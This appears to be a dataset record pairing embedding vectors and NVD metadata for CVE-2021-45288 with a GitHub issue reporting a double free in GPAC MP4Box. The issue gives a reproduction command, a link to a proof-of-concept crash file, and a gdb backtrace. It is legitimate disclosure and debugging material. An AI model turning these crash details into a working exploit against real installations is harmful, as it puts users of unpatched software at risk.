-0.0039569721557199955, 0.007015539798885584, -0.0032502273097634315, -0.00623292988166213, -0.028205905109643936, -0.003825206309556961, 0.0331571102142334, -0.00363953597843647, 0.005182795226573944, 0.007889986969530582, -0.02105061337351799, 0.02807813137769699, 0.00634473143145442, 0.010996469296514988, 0.014981391839683056, 0.008912171237170696, -0.02545878291130066, -0.01983676850795746, 0.01058120746165514, 0.007590518798679113, 0.0046437522396445274, 0.003409943776205182, -0.005753780715167522, 0.0006573325372301042, -0.02346232905983925, -0.016091421246528625, 0.0007092403247952461, 0.003633546642959118, -0.002349826507270336, 0.013248469680547714, 0.0006613254663534462, -0.0000013725622238780488, -0.0011319895274937153, -0.005618021823465824, -0.019708994776010513, -0.001523294486105442, 0.008033731952309608, -0.0029387804679572582, 0.005961412098258734, 0.005110922735184431, -0.008153518661856651, -0.010900639928877354, -0.010181915946304798, -0.0006159060867503285, 0.002062337240204215, 0.009574994444847107, -0.007139320019632578, 0.016658414155244827, 0.020507577806711197, 0.035680629312992096, 0.009966298937797546, -0.01716950535774231, -0.020044399425387383, -0.009822554886341095, -0.01237801555544138, -0.009559022262692451, 0.007654405198991299, -0.008017759770154953, 0.015220966190099716, 0.005733816418796778, 0.01319256890565157, -0.003346057143062353, 0.0016201225807890296, -0.006049256306141615, 0.02071520872414112, -0.0003279176016803831, -0.019740939140319824, -0.0007466738461516798, 0.010453433729708195, 0.005390426144003868, -0.013208541087806225, -0.028764910995960236, -0.00810959655791521, -0.005498234648257494, -0.0028489402029663324, 0.028477422893047333, -0.0030266244430094957, 0.008009773679077625, 0.012753348797559738, -0.004815447609871626, -0.007893979549407959, 0.014398427680134773, 0.007754228077828884, -0.005214738193899393, 0.029036428779363632, -0.008448993787169456, -0.005458305589854717, -0.011667278595268726, 0.005422369576990604, 0.006839851848781109, -0.006787944119423628, 0.020731180906295776, -0.005829646252095699, -0.014254682697355747, 0.021657533943653107, -0.0013046828098595142, -0.009111816994845867, 0.001053129555657506, 0.005685901269316673, 0.017472967505455017, -0.013903306797146797, -0.0017898211954161525, -0.010381561703979969, -0.006847837939858437, 0.03465844318270683, -0.015620257705450058, -3.3534192311890365e-7, -0.0323265865445137, -0.002443659817799926, -0.021066583693027496, -0.02956349402666092, 0.011228058487176895, -0.009838526137173176, -0.0040288446471095085, 0.008576767519116402, -0.007766206748783588, -0.009471178986132145, -0.014350512996315956, -0.0195333082228899, 0.01129993051290512, -0.009870469570159912, 0.021737392991781235, -0.02874894067645073, -0.012569675222039223, 0.010221845470368862, -0.02141796052455902, -0.00502307852730155, 0.008273306302726269, 0.0069037387147545815, -0.011076327413320541, -0.02557058446109295, -0.010645093396306038, -0.0014005126431584358, 0.013847406022250652, -0.012889107689261436, -0.0044121635146439075, 0.0015133122215047479, -0.009327434003353119, -0.010788838379085064, -0.0053664688020944595, -0.012769320979714394, 0.019245818257331848, 0.005821660161018372, 0.013176597654819489, -0.03052179142832756, 0.00340395444072783, -0.01601954735815525, -0.009087859652936459, 0.007822107523679733, -0.003465844551101327, -0.002980706049129367, -0.005414383485913277, -0.03263004869222641, 0.00340395444072783, -0.013815462589263916, -0.004116688389331102, -0.00930347666144371, 0.020747151225805283, -0.0015153087442740798, -0.0015971633838489652, 0.004172589164227247, 0.005973390769213438, 0.012976951897144318, -0.010014214552938938, 0.01694590225815773, 0.018399322405457497, 0.009263547137379646, -0.004300362430512905, 0.021929051727056503, -0.007426809519529343, -0.020060371607542038, -0.014725846238434315, -0.002120234305039048, -0.008480937220156193, -0.002759099705144763, -0.015436583198606968, -0.013535959646105766, -0.0053664688020944595, 0.007434795144945383, 0.004188560880720615, 0.01226621400564909, -0.017584769055247307, 0.0033161104656755924, 0.0024496493861079216, 0.003104486269876361, -0.011403745971620083, 0.003815223928540945, -0.000350876827724278, 0.009535064920783043, 0.0007222173153422773, -0.008209419436752796, -0.001114021404646337, -0.022040853276848793, 0.018415292724967003, -0.008960085920989513, 0.008776412345468998, -0.02301512286067009, -0.0077103059738874435, -0.00703949760645628, 0.018750697374343872, -0.014542171731591225, 0.025618499144911766, -0.007758221123367548, -0.01879861205816269, 0.005817667581140995, -0.014717860147356987, 0.024021336808800697, -0.012873136438429356, -0.03171966224908829, 0.01902221515774727, 0.005857596639543772, -0.014118923805654049, 0.010086086578667164, 0.01026976015418768, -0.027215663343667984, -0.005709859076887369, -0.017664626240730286, 0.015859831124544144, 0.006380667444318533, -0.00141249131411314, -0.013607831671833992, -0.032390471547842026, -0.005214738193899393, 0.002285940106958151, 0.0030825252179056406, 0.00576176680624485, 0.00657632015645504, 0.0033660216722637415, -0.0174250528216362, -0.009630895219743252, 0.013951221480965614, 0.008173483423888683, 0.015173051506280899, -0.006384660489857197, -0.014590087346732616, 0.013759561814367771, -0.0025474755093455315, -0.012314129620790482, 0.06656976789236069, 0.008648639544844627, 0.013344299979507923, -0.0046637170016765594, 0.004959192126989365, -0.0100461570546031, -0.016067463904619217, -0.00398292625322938, -0.006488475948572159, 0.007091405335813761, -0.008608710020780563, -0.004971170797944069, 0.009407292120158672, -0.0023697910364717245, 0.002124227350577712, 0.004292376339435577, -0.012282186187803745, 0.006149078719317913, -0.002990688430145383, -0.0023697910364717245, -0.0009617917821742594, -0.006911724340170622, 0.03133634477853775, -0.021370045840740204, -0.017840314656496048, 0.0005565115716308355, -0.006264873314648867, -0.02959543652832508, -0.0009523086482658982, -0.0004506995319388807, 0.01143568940460682, -0.017073675990104675, -0.008920157328248024, 0.00991838425397873, 0.012034625746309757, 0.008536837995052338, 0.01908610202372074, 0.028094103559851646, -0.019229846075177193, -0.00007162279507610947, 0.024500485509634018, -0.011275973170995712, -0.03195923939347267, 0.005506220739334822, -0.008480937220156193, 0.009375348687171936, -0.016658414155244827, 0.04069572314620018, 0.002815000480040908, 0.029164202511310577, 0.006568334065377712, 0.007426809519529343, -0.0016770215006545186, 0.0051189083606004715, 0.02242417261004448, -0.017265336588025093, 0.00872849766165018, -0.005162830464541912, -0.01750491000711918, -0.006157064810395241, -0.0010900639463216066, -0.020363831892609596, -0.008664610795676708, -0.02130615897476673, -0.016882017254829407, -0.008664610795676708, 0.02596987597644329, 0.00529858935624361, -0.020747151225805283, 0.025442812591791153, -0.0059294686652719975, -0.004799475893378258, -0.025858074426651, -0.015548384748399258, 0.002872897544875741, -0.020443690940737724, 0.006791937164962292, -0.017137562856078148, 0.019149988889694214, -0.008073660545051098, -0.00837712176144123, -0.015548384748399258, 0.008760441094636917, -0.006037277635186911, 0.03491399064660072, -0.003749341005459428, -0.011619362980127335, 0.004100716672837734, 0.007103384006768465, 0.008536837995052338, 0.017728513106703758, 0.007374901790171862, -0.007562568411231041, -0.002463624347001314, 0.023701904341578484, -0.01621919311583042, 0.0005108427139930427, 0.003954975865781307, -0.0011988707119598985, 0.023110954090952873, 0.0012557696318253875, -0.0027071917429566383, -0.0010321667650714517, 0.0000877192069310695, 0.006200986448675394, 0.007985816337168217, 0.00007692587678320706, -0.009383334778249264, -0.003911053761839867, 0.00548625597730279, 0.006536391098052263, -0.005414383485913277, -0.015827888622879982, -0.0032522238325327635, 0.00906390231102705, 0.000056867749663069844, 0.004523965064436197, -0.021034641191363335, -0.011204101145267487, 0.005454313009977341, -0.005446326918900013, -0.0016081437934190035, 0.011475618928670883, -0.0011579433921724558, -0.012218299321830273, 0.005725830793380737, 0.015811916440725327, 0.014821675606071949, 0.011156185530126095, -0.010716966353356838, 0.011347845196723938, -0.004971170797944069, 0.01398316491395235, 0.0165785551071167, 0.0059294686652719975, 0.013208541087806225, 0.0054183765314519405, 0.012298157438635826, 0.017808370292186737, 0.006033284589648247, 0.00789797306060791, 0.051109228283166885, -0.004619794897735119, 0.003401957917958498, -0.007634440902620554, 0.002697209594771266, 0.0031384259928017855, -0.0003126946394331753, -0.007458752952516079, 0.0006907731294631958, 0.017728513106703758, -0.0006403626757673919, -0.004567887168377638, -0.009087859652936459, -0.006879780907183886, 0.019149988889694214, 0.018559038639068604, 0.026848316192626953, -0.00270519545301795, 0.005158837419003248, 0.0002292178978677839, 0.01385539211332798, -0.012322114780545235, -0.009638880379498005, 0.017345193773508072, -0.00824934896081686, 0.02579418756067753, -0.0016860055038705468, 0.02526712417602539, 0.006791937164962292, -0.02886074222624302, -0.004304355010390282, -0.004867355339229107, -0.00645653298124671, 0.014238711446523666, 0.02908434346318245, 0.01986871100962162, -0.010277746245265007, 0.021849194541573524, 0.026624713093042374, 0.01961316540837288, 0.02411716617643833, -0.017520882189273834, -0.009407292120158672, 0.0060532488860189915, -0.008369135670363903, -0.011275973170995712, -0.004703646060079336, 0.037277791649103165, -0.004400184843689203, 0.021817252039909363, -0.028876712545752525, 0.0115235336124897, 0.00680790888145566, -0.006991582456976175, 0.0167223010212183, -0.0003104486095253378, 0.0006139096803963184, 0.019740939140319824, 0.005063007585704327, 0.026608740910887718, -0.006288830656558275, -0.010014214552938938, -0.007598504424095154 ]
CVE-2021-45288
2021-12-21T17:15:08.630000
A Double Free vulnerability exists in filedump.c in GPAC 1.0.1, which could cause a Denail of Service via a crafted file in the MP4Box command.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1956" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:1.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "82DD2D40-0A05-48FD-940D-32B4D8B51AB3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/gpac/gpac/issues/1956
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [Yes ] I looked for a similar issue and couldn't find any. - [ Yes] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [ Yes] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ **Version:** ``` ./MP4Box -version MP4Box - GPAC version 1.1.0-DEV-rev1527-g6fcf9819e-master (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io MINI build (encoders, decoders, audio and video output disabled) Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: --static-mp4box --prefix=/home/zxq/CVE_testing/sourceproject/gpac/cmakebuild --enable-debug Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_FREETYPE GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_DISABLE_3D ``` **System information** Ubuntu 20.04.1 LTS, gcc version 9.3.0 (Ubuntu 9.3.0-17ubuntu1~20.04) **command:** ``` ./bin/gcc/MP4Box -bt POC ``` [POC.zip](https://github.com/gpac/gpac/files/7690783/POC.zip) **Result** ``` [iso file] extra box maxr found in hinf, deleting [iso file] extra box maxr found in hinf, deleting [ODF] Not enough bytes (10) to read descriptor (size=127) [ODF] Error reading descriptor (tag 4 size 21): Invalid MPEG-4 Descriptor [iso file] Incomplete box mdat - start 11495 size 75 [iso file] Incomplete file while reading for dump - aborting parsing [iso file] extra box maxr found in hinf, deleting [iso file] extra box maxr found in hinf, deleting [ODF] Not enough bytes (10) to read descriptor (size=127) [ODF] Error reading descriptor (tag 4 size 21): Invalid MPEG-4 Descriptor [iso file] Incomplete box mdat - start 11495 size 75 [iso file] Incomplete file while reading for dump - aborting parsing MPEG-4 BIFS Scene Parsing [MP4 Loading] Unable to fetch sample 1 from track ID 7 - aborting track import free(): double free detected in tcache 2 [3] 3698317 abort ./bin/gcc/MP4Box -bt ``` **gdb information:** ``` Program received signal SIGABRT, Aborted. [----------------------------------registers-----------------------------------] RAX: 0x0 RBX: 0x7ffff5654740 (0x00007ffff5654740) RCX: 0x7ffff61d118b (<__GI_raise+203>: mov rax,QWORD PTR [rsp+0x108]) RDX: 0x0 RSI: 0x7fffffff6fd0 --> 0x0 RDI: 0x2 RBP: 0x7fffffff7320 --> 0x7ffff6376b80 --> 0x0 RSP: 0x7fffffff6fd0 --> 0x0 RIP: 0x7ffff61d118b (<__GI_raise+203>: mov rax,QWORD PTR [rsp+0x108]) R8 : 0x0 R9 : 0x7fffffff6fd0 --> 0x0 R10: 0x8 R11: 0x246 R12: 0x7fffffff7240 --> 0x0 R13: 0x10 R14: 0x7ffff7ffb000 --> 0x6565726600001000 R15: 0x1 EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x7ffff61d117f <__GI_raise+191>: mov edi,0x2 0x7ffff61d1184 <__GI_raise+196>: mov eax,0xe 0x7ffff61d1189 <__GI_raise+201>: syscall => 0x7ffff61d118b <__GI_raise+203>: mov rax,QWORD PTR [rsp+0x108] 0x7ffff61d1193 <__GI_raise+211>: xor rax,QWORD PTR fs:0x28 0x7ffff61d119c <__GI_raise+220>: jne 0x7ffff61d11c4 <__GI_raise+260> 0x7ffff61d119e <__GI_raise+222>: mov eax,r8d 0x7ffff61d11a1 <__GI_raise+225>: add rsp,0x118 [------------------------------------stack-------------------------------------] 0000| 0x7fffffff6fd0 --> 0x0 0008| 0x7fffffff6fd8 --> 0x0 0016| 0x7fffffff6fe0 --> 0x7ffff6b0ffca (<Media_GetESD+842>: mov rax,QWORD PTR [rsp+0x10]) 0024| 0x7fffffff6fe8 --> 0x0 0032| 0x7fffffff6ff0 --> 0x1 0040| 0x7fffffff6ff8 --> 0x0 0048| 0x7fffffff7000 --> 0x5555556709a0 --> 0x80003 0056| 0x7fffffff7008 --> 0x0 [------------------------------------------------------------------------------] Legend: code, data, rodata, value Stopped reason: SIGABRT __GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:50 50 ../sysdeps/unix/sysv/linux/raise.c: No such file or directory. gdb-peda$ bt #0 __GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:50 #1 0x00007ffff61b0859 in __GI_abort () at abort.c:79 #2 0x00007ffff621b3ee in __libc_message (action=action@entry=do_abort, fmt=fmt@entry=0x7ffff6345285 "%s\n") at ../sysdeps/posix/libc_fatal.c:155 #3 0x00007ffff622347c in malloc_printerr (str=str@entry=0x7ffff63475d0 "free(): double free detected in tcache 2") at malloc.c:5347 #4 0x00007ffff62250ed in _int_free (av=0x7ffff6376b80 <main_arena>, p=0x555555671790, have_lock=0x0) at malloc.c:4201 #5 0x00007ffff6bf30f5 in gf_odf_del_default () from /home/zxq/CVE_testing/project/gpac/bin/gcc/libgpac.so.10 #6 0x00007ffff6f56654 in gf_sm_load_run_isom () from /home/zxq/CVE_testing/project/gpac/bin/gcc/libgpac.so.10 #7 0x00005555555c3a18 in dump_isom_scene (file=<optimized out>, inName=0x555555644d20 <outfile> "../../result/gpac/afl-outbox-bt-d/crashes/id:000000,sig:06,src:000181,op:havoc,rep:64", is_final_name=GF_FALSE, dump_mode=GF_SM_DUMP_BT, do_log=GF_FALSE, no_odf_conv=GF_FALSE) at filedump.c:199 #8 0x000055555559edd0 in mp4boxMain (argc=<optimized out>, argv=<optimized out>) at main.c:6044 #9 0x00007ffff61b20b3 in __libc_start_main (main=0x55555556d540 <main>, argc=0x3, argv=0x7fffffffe318, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe308) at ../csu/libc-start.c:308 #10 0x000055555556d5be in _start () at main.c:6496 gdb-peda$ '''
Double Free in filedump.c:199
https://api.github.com/repos/gpac/gpac/issues/1956/comments
0
2021-12-10T07:28:18
2021-12-10T10:01:22Z
https://github.com/gpac/gpac/issues/1956
1,076,525,998
1,956
true
This is a GitHub Issue repo:gpac owner:gpac Title : Double Free in filedump.c:199 Issue date: --- start body --- Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [Yes ] I looked for a similar issue and couldn't find any. - [ Yes] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [ Yes] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ **Version:** ``` ./MP4Box -version MP4Box - GPAC version 1.1.0-DEV-rev1527-g6fcf9819e-master (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io MINI build (encoders, decoders, audio and video output disabled) Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: --static-mp4box --prefix=/home/zxq/CVE_testing/sourceproject/gpac/cmakebuild --enable-debug Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_FREETYPE GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_DISABLE_3D ``` **System information** Ubuntu 20.04.1 LTS, gcc version 9.3.0 (Ubuntu 9.3.0-17ubuntu1~20.04) **command:** ``` ./bin/gcc/MP4Box -bt POC ``` [POC.zip](https://github.com/gpac/gpac/files/7690783/POC.zip) **Result** ``` [iso file] extra box maxr found in hinf, deleting [iso file] extra box maxr found in hinf, deleting [ODF] Not enough bytes (10) to read descriptor (size=127) [ODF] Error reading descriptor (tag 4 size 21): Invalid MPEG-4 Descriptor [iso file] Incomplete box mdat - start 11495 size 75 [iso file] Incomplete file while reading for dump - aborting parsing [iso file] extra box maxr found in hinf, deleting [iso file] extra box maxr found in hinf, deleting [ODF] Not enough bytes (10) to read descriptor (size=127) [ODF] Error reading descriptor (tag 4 size 21): Invalid MPEG-4 Descriptor [iso file] Incomplete box mdat - start 11495 size 75 [iso file] Incomplete file while reading for dump - aborting parsing MPEG-4 BIFS Scene Parsing [MP4 Loading] Unable to fetch sample 1 from track ID 7 - aborting track import free(): double free detected in tcache 2 [3] 3698317 abort ./bin/gcc/MP4Box -bt ``` **gdb information:** ``` Program received signal SIGABRT, Aborted. [----------------------------------registers-----------------------------------] RAX: 0x0 RBX: 0x7ffff5654740 (0x00007ffff5654740) RCX: 0x7ffff61d118b (<__GI_raise+203>: mov rax,QWORD PTR [rsp+0x108]) RDX: 0x0 RSI: 0x7fffffff6fd0 --> 0x0 RDI: 0x2 RBP: 0x7fffffff7320 --> 0x7ffff6376b80 --> 0x0 RSP: 0x7fffffff6fd0 --> 0x0 RIP: 0x7ffff61d118b (<__GI_raise+203>: mov rax,QWORD PTR [rsp+0x108]) R8 : 0x0 R9 : 0x7fffffff6fd0 --> 0x0 R10: 0x8 R11: 0x246 R12: 0x7fffffff7240 --> 0x0 R13: 0x10 R14: 0x7ffff7ffb000 --> 0x6565726600001000 R15: 0x1 EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x7ffff61d117f <__GI_raise+191>: mov edi,0x2 0x7ffff61d1184 <__GI_raise+196>: mov eax,0xe 0x7ffff61d1189 <__GI_raise+201>: syscall => 0x7ffff61d118b <__GI_raise+203>: mov rax,QWORD PTR [rsp+0x108] 0x7ffff61d1193 <__GI_raise+211>: xor rax,QWORD PTR fs:0x28 0x7ffff61d119c <__GI_raise+220>: jne 0x7ffff61d11c4 <__GI_raise+260> 0x7ffff61d119e <__GI_raise+222>: mov eax,r8d 0x7ffff61d11a1 <__GI_raise+225>: add rsp,0x118 [------------------------------------stack-------------------------------------] 0000| 0x7fffffff6fd0 --> 0x0 0008| 0x7fffffff6fd8 --> 0x0 0016| 0x7fffffff6fe0 --> 0x7ffff6b0ffca (<Media_GetESD+842>: mov rax,QWORD PTR [rsp+0x10]) 0024| 0x7fffffff6fe8 --> 0x0 0032| 0x7fffffff6ff0 --> 0x1 0040| 0x7fffffff6ff8 --> 0x0 0048| 0x7fffffff7000 --> 0x5555556709a0 --> 0x80003 0056| 0x7fffffff7008 --> 0x0 [------------------------------------------------------------------------------] Legend: code, data, rodata, value Stopped reason: SIGABRT __GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:50 50 ../sysdeps/unix/sysv/linux/raise.c: No such file or directory. gdb-peda$ bt #0 __GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:50 #1 0x00007ffff61b0859 in __GI_abort () at abort.c:79 #2 0x00007ffff621b3ee in __libc_message (action=action@entry=do_abort, fmt=fmt@entry=0x7ffff6345285 "%s\n") at ../sysdeps/posix/libc_fatal.c:155 #3 0x00007ffff622347c in malloc_printerr (str=str@entry=0x7ffff63475d0 "free(): double free detected in tcache 2") at malloc.c:5347 #4 0x00007ffff62250ed in _int_free (av=0x7ffff6376b80 <main_arena>, p=0x555555671790, have_lock=0x0) at malloc.c:4201 #5 0x00007ffff6bf30f5 in gf_odf_del_default () from /home/zxq/CVE_testing/project/gpac/bin/gcc/libgpac.so.10 #6 0x00007ffff6f56654 in gf_sm_load_run_isom () from /home/zxq/CVE_testing/project/gpac/bin/gcc/libgpac.so.10 #7 0x00005555555c3a18 in dump_isom_scene (file=<optimized out>, inName=0x555555644d20 <outfile> "../../result/gpac/afl-outbox-bt-d/crashes/id:000000,sig:06,src:000181,op:havoc,rep:64", is_final_name=GF_FALSE, dump_mode=GF_SM_DUMP_BT, do_log=GF_FALSE, no_odf_conv=GF_FALSE) at filedump.c:199 #8 0x000055555559edd0 in mp4boxMain (argc=<optimized out>, argv=<optimized out>) at main.c:6044 #9 0x00007ffff61b20b3 in __libc_start_main (main=0x55555556d540 <main>, argc=0x3, argv=0x7fffffffe318, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe308) at ../csu/libc-start.c:308 #10 0x000055555556d5be in _start () at main.c:6496 gdb-peda$ ''' --- end body ---
6,096
[ -0.019182071089744568, 0.018182668834924698, -0.010485661216080189, 0.01245222706347704, 0.025033408775925636, 0.017392819747328758, -0.027741465717554092, 0.03975040838122368, -0.016393417492508888, 0.03238384798169136, -0.012871330603957176, -0.006741933524608612, 0.033431608229875565, -0.006504172924906015, 0.00021673020091839135, 0.01200894359499216, -0.029514597728848457, 0.022164156660437584, -0.01087252702564001, -0.02680654078722, 0.018182668834924698, -0.01763460971415043, -0.025500871241092682, 0.03530145809054375, -0.012887449935078621, 0.01902087777853012, -0.008656110614538193, 0.020665055140852928, 0.02917609177529812, 0.027370719239115715, -0.014547746628522873, 0.012685957364737988, -0.011412526480853558, 0.01563580520451069, 0.05867457017302513, 0.010106856003403664, 0.048422638326883316, 0.06911993026733398, -0.008309544064104557, 0.004521488212049007, 0.00843849964439869, -0.054032184183597565, -0.037396978586912155, 0.03222265467047691, -0.01440267264842987, 0.038944438099861145, 0.011662377044558525, -0.027225645259022713, -0.04713308811187744, 0.012218495830893517, 0.016957595944404602, -0.008301484398543835, -0.005250890273600817, -0.04223279282450676, 0.02002027817070484, -0.047939058393239975, 0.017441177740693092, 0.025855496525764465, 0.0016199983656406403, 0.020890725776553154, -0.017666848376393318, 0.01711878925561905, 0.0030143253970891237, 0.011477003805339336, -0.001797311706468463, 0.009921482764184475, 0.001895035500638187, 0.010961183346807957, -0.016046850010752678, 0.009736109524965286, -0.011348048225045204, -0.015023268759250641, 0.00478745810687542, 0.002726191421970725, 0.02280893363058567, -0.04571458324790001, 0.03562384471297264, 0.02456594631075859, -0.009405662305653095, 0.02469490095973015, -0.045424431562423706, 0.023711618036031723, -0.015579387545585632, 0.005734472069889307, 0.017102669924497604, 0.0007616410730406642, -0.03468891978263855, -0.0711832121014595, -0.016909237951040268, -0.017408939078450203, -0.011509242467582226, 0.02114863693714142, 0.0074673062190413475, -0.00438447343185544, -0.0025952213909476995, 0.012049241922795773, -0.03426981717348099, 0.012750435620546341, -0.07015157490968704, -0.011025660671293736, -0.055482931435108185, -0.02163221687078476, -0.00776954460889101, 0.0032641759607940912, -0.0031009670346975327, 0.0037598470225930214, -0.002232535043731332, -0.00893819984048605, 0.04165249690413475, 0.15126432478427887, 0.008857603184878826, 0.00559745728969574, -0.01987520419061184, 0.02074565179646015, 0.011775212362408638, 0.012363569810986519, 0.016731923446059227, -0.0011434690095484257, -0.05425785854458809, -0.01307282317429781, -0.004106414038687944, -0.022373709827661514, -0.018231026828289032, 0.03062683530151844, -0.02645191363990307, 0.05116293579339981, 0.00839014071971178, -0.026709824800491333, -0.04278085380792618, -0.011855809018015862, -0.04365130141377449, -0.056933674961328506, 0.011670436710119247, -0.018456697463989258, -0.008970439434051514, 0.0009510438540019095, -0.02259938046336174, 0.04313547909259796, 0.0018224981613457203, 0.009276707656681538, -0.03241608664393425, -0.01684475876390934, 0.021487142890691757, 0.007717156782746315, -0.03249668329954147, -0.018956398591399193, 0.005395964719355106, 0.005468502175062895, -0.009333125315606594, 0.007660738658159971, -0.006556560751050711, -0.006282531190663576, 0.01495073176920414, 0.028982657939195633, 0.04729428142309189, -0.010493720881640911, -0.006016561295837164, 0.04558562859892845, -0.018666250631213188, -0.028499076142907143, -0.014023866504430771, -0.030610715970396996, 0.0078017832711339, -0.04378025606274605, -0.03468891978263855, -0.019617294892668724, 0.028208928182721138, 0.0006709694862365723, 0.00020426286209840328, 0.02187400870025158, -0.0014245508937165141, -0.006338948849588633, 0.020374905318021774, 0.034785639494657516, -0.05567636340856552, -0.005766710732132196, -0.004207159858196974, 0.040362946689128876, -0.009357304312288761, -0.004718950483947992, -0.008144319988787174, 0.0024138782173395157, -0.0067056650295853615, 0.00294581800699234, 0.005807009059935808, -0.01229909248650074, 0.0009797564707696438, -0.03020773082971573, 0.010759690776467323, -0.01981072686612606, 0.00012945882917847484, -0.014991030097007751, 0.01428177673369646, 0.007455216720700264, 0.05583755671977997, -0.006286561023443937, -0.031368326395750046, 0.004924472887068987, -0.00876894686371088, 0.010211631655693054, 0.011339988559484482, -0.012210436165332794, -0.024614304304122925, 0.019617294892668724, -0.020310427993535995, 0.019520577043294907, -0.01990744285285473, 0.031029820442199707, 0.015128045342862606, -0.014982970431447029, -0.008200738579034805, -0.03038504533469677, 0.009719990193843842, 0.010687153786420822, -0.024211319163441658, 0.01932714506983757, 0.0026959674432873726, 0.008277305401861668, -0.019133713096380234, -0.01100954134017229, 0.03723578527569771, 0.0014316031010821462, 0.019826846197247505, -0.029401762410998344, -0.03125549107789993, -0.03249668329954147, 0.002232535043731332, 0.008208798244595528, -0.03462444245815277, 0.01781192235648632, 0.04365130141377449, 0.015410134568810463, -0.02514624409377575, -0.006641187705099583, 0.00167540879920125, 0.012798793613910675, -0.01142058614641428, -0.011235212907195091, -0.0006679471116513014, 0.006580739747732878, 0.011033720336854458, 0.033882953226566315, -0.030707431957125664, -0.0011857823701575398, -0.008704469539225101, 0.07995215803384781, -0.025645945221185684, -0.022954007610678673, -0.004585965536534786, 0.02101968042552471, 0.009816707111895084, -0.027128929272294044, -0.016320880502462387, 0.0000616125762462616, 0.010002079419791698, 0.0015514909755438566, 0.01856953464448452, 0.015031328424811363, -0.026161765679717064, -0.005335517227649689, 0.013499986380338669, -0.0019806697964668274, -0.04465070366859436, 0.0039170109666883945, 0.03127161040902138, 0.002925668843090534, -0.014475209638476372, -0.0017086550360545516, -0.02841847948729992, -0.028192808851599693, 0.02641967497766018, -0.026983853429555893, -0.029788628220558167, -0.029127731919288635, -0.0026435796171426773, 0.0006765105063095689, -0.005794919561594725, 0.002365519991144538, 0.007842081598937511, 0.010082677006721497, -0.005738501902669668, 0.0319647453725338, -0.026339078322052956, 0.03356056287884712, 0.0018366026924923062, -0.00799521617591381, 0.02166445553302765, -0.011549540795385838, -0.02535579539835453, 0.011291630566120148, 0.02163221687078476, 0.028724748641252518, -0.04384473338723183, 0.021938486024737358, 0.012500585056841373, 0.022502664476633072, -0.0222608745098114, 0.0032823102083057165, -0.0375581718981266, 0.0035442502703517675, -0.0018486921908333898, 0.0063752178102731705, 0.006516262423247099, 0.0243886336684227, -0.010808048769831657, -0.001427573268301785, -0.0372680239379406, 0.027951017022132874, -0.003217832650989294, 